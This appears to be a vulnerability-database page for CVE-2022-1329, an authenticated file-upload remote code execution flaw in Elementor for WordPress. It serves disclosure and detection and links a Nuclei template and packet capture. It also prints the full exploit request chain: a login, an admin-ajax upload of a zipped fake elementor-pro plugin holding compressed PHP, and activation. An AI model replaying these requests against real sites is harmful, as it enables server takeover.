🔙 목록으로 돌아가기

CVE-2022-1329: Elementor Website Builder - Remote Code Execution

TitleElementor Website Builder - Remote Code Execution
Authortheamanrawat
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationFixed in version 3.6.3
CVSS Score8.8
EPSS Score0.93475
CVE IDCVE-2022-1329
CWE IDCWE-434,CWE-862
Tags cve2022 cve rce wordpress wp-plugin wp elementor authenticated intrusive fileupload vkev vuln

🔍 Vulnerability Description

The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution.

🌐 HTTP Request

POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=gp1CTe&pwd=LSA2Uz&wp-submit=Log+In
GET /wp-admin/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Connection: close
Content-Length: 1409
Content-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea
Accept-Encoding: gzip

--336b29d7aee0463d8b651303eab505ea

Content-Disposition: form-data; name="action"



elementor_upload_and_install_pro

--336b29d7aee0463d8b651303eab505ea

Content-Disposition: form-data; name="_nonce"



WICTGM

--336b29d7aee0463d8b651303eab505ea

Content-Disposition: form-data; name="fileToUpload"; filename="38F5MXtR3Uk37E41z7qjsluICY5.zip"



PK�"gV elementor-pro/UT
�,d�,d�,dux��PK|(gV: elementor-pro/elementor-pro.phpUT
<6d=6d<6dux���R]O�@|�ł��|��Vj(����q@����^ǧ��Nw����9����o������~�Х����T�.a�*�C$�B锁�Q�z�63\;�d�w�Z��j.r4P2���a`2��A�B���@�g���9���lA�R.Z���K̹�r�jx*e�#t`3s�j�����P:�m�����LU݋�UOV�&��n��~��4����vmx�^�����ҏ	kW*�㐧��{4�q��s��_E�a��"?)�gתb�濎�/5�~y磝\f��B�5��-�-Tn�0�`U�V��I�U
��Lέ3<�)s��̻�P��kOBo����L�ʂ*���dN�I4L��N���g(-݌�/��Hӆ�w���V3�-@Nuˍ�p�2cK؂͚L�AЦ��ΟV}�(�!�S*M�K��>+.��Ţ-�O`x'7w���#<�qN��3S`T�%n�x�'f��0��$�3|���
��W��q�H�a8N&�lûB��q2�o���xz7�:0C����/7�&r,GǸ�~�n���=n-���O�(�q�2Ǘ���ϣ���AWy��
������>j�>�z��ޗ�#�߂�PK~K�f:PK�"gV �Aelementor-pro/UT
�,d�,d�,dux��PK|(gV~K�f: ��Lelementor-pro/elementor-pro.phpUT
<6d=6d<6dux��PK�

--336b29d7aee0463d8b651303eab505ea--
GET /index.php?activate=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1329.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1329.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A